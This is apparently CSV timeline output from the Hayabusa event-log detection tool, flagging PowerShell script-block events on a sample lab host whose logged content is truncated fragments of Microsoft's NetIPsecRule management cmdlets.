[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) 
